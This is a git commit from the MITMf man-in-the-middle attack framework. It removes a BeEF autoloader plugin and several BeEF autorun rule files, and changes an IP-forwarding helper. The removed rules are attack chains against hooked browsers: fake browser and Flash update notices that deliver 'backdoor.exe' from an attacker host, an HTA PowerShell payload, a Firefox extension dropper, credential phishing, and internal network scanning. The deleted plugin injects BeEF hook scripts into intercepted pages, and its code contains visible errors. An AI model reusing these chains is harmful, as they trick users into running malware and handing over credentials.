Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine

removed check to enable IP forwarding using sysctl
This commit is contained in:
byt3bl33d3r 2015-08-23 01:33:16 +02:00
parent 77fc00539e
commit 24070afbd0
11 changed files with 4 additions and 300 deletions

View file

@ -1,35 +0,0 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "S",
"browser_version": ">= 7",
"os": "OSX",
"os_version": "<= 10.10",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}

View file

@ -1,3 +0,0 @@
*
!.gitignore
!README

View file

@ -1,2 +0,0 @@
Move here the ARE rule files that you want to load into BeEF.
Make sure they are .json files (any other file extension is ignored).

View file

@ -1,20 +0,0 @@
{
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"browser_version": "ALL",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
"name": "firefox_extension_dropper",
"condition": null,
"options": {
"extension_name": "Ummeneske",
"xpi_name": "Ummeneske",
"base_host": "http://172.16.45.1:3000"
}
}],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}

View file

@ -1,28 +0,0 @@
{"name": "Get Internal IP (WebRTC)",
"author": "antisnatchor",
"browser": "FF",
"browser_version": ">= 31",
"os": "Linux",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "internal_network_fingerprinting",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80",
"threads":"5",
"wait":"2",
"timeout":"10"
}
}
],
"execution_order": [0,1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}

View file

@ -1,31 +0,0 @@
{
"name": "Ie Fake Notification + Clippy",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "== 11",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
}
}
,{
"name": "clippy",
"condition": null,
"options": {
"clippydir": "http://172.16.45.1:3000/clippy/",
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
"respawntime":"5000",
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
}
}
],
"execution_order": [0,1],
"execution_delay": [0,2000],
"chain_mode": "sequential"
}

View file

@ -1,27 +0,0 @@
{
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "ALL",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
}
},
{
"name": "hta_powershell",
"condition": null,
"options": {
"domain":"http://172.16.45.1:3000",
"ps_url":"/ps"
}
}],
"execution_order": [0,1],
"execution_delay": [0,500],
"chain_mode": "sequential"
}

View file

@ -1,27 +0,0 @@
{
"name": "Fake missing plugin + Pretty Theft LinkedIn",
"author": "antisnatchor",
"browser": "IE",
"browser_version": ">= 8",
"os": "Windows",
"os_version": "== XP",
"modules": [{
"name": "fake_notification_c",
"condition": null,
"options": {
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
}
}, {
"name": "pretty_theft",
"condition": null,
"options": {
"choice": "Windows",
"backing": "Grey",
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
}
}],
"execution_order": [0, 1],
"execution_delay": [0, 5000],
"chain_mode": "sequential"
}

View file

@ -1,35 +0,0 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "<= 8",
"os": "Windows",
"os_version": ">= XP",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}

View file

@ -21,7 +21,6 @@ import logging
import re import re
import sys import sys
from commands import getstatusoutput
from core.logger import logger from core.logger import logger
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
@ -35,15 +34,10 @@ def shutdown(message=None):
sys.exit(message) sys.exit(message)
def set_ip_forwarding(value): def set_ip_forwarding(value):
status, result = getstatusoutput('sysctl --help') log.debug("Setting ip forwarding to {}".format(value))
if status == 0: with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
log.debug("Setting ip forwarding to {} using sysctl".format(value)) file.write(str(value))
os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX file.close()
else:
log.debug("Setting ip forwarding to {}".format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def get_iface(): def get_iface():
iface = get_working_if() iface = get_working_if()

View file

@ -1,82 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
import pyinotify
from plugins.plugin import Plugin
from plugins.inject import Inject
from core.beefapi import BeefAPI
class BeefAutorun(Inject, Plugin):
name = "BeEFAutoloader"
optname = "beefauto"
desc = "Injects BeEF hooks & manages BeEF's ARE rule loading"
version = "0.4"
def initialize(self, options):
self.options = options
self.ip_address = options.ip
beefconfig = self.config['MITMf']['BeEF']
Inject.initialize(self, options)
self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
beefconfig = self.config['MITMf']['BeEF']
from core.utils import shutdown
beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
if not beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
self.tree_info.append('Starting RuleWatcher')
RuleWatcher(beef, self.log).start()
def options(self, options):
pass
class RuleWatcher(pyinotify.ProcessEvent):
def __init__(self, beef, logger):
pyinotify.ProcessEvent.__init__(self)
self.beef = beef
self.log = logger
def process_IN_MODIFY(self, event):
self.log.debug('Detected ARE rule change!')
for rule in self.beef.are_rules.list():
self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
rule.delete()
if event.src_path.endswith('.json'):
self.log.debug('Detected ARE rule modification/addition!')
for rule in os.listdir('./config/beef_arerules/enabled'):
if rule.endswith('.json'):
rule_path = './config/beef_arerules/enabled/' + rule
self.log.debug('Adding rule {}'.format(rule_path))
self.beef.are_rules.add(rule_path)
def start(self):
wm = pyinotify.WatchManager()
wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY)
notifier = pyinotify.Notifier(wm, self)
t = threading.Thread(name='RuleWatcher', target=notifier.loop)
t.setDaemon(True)
t.start()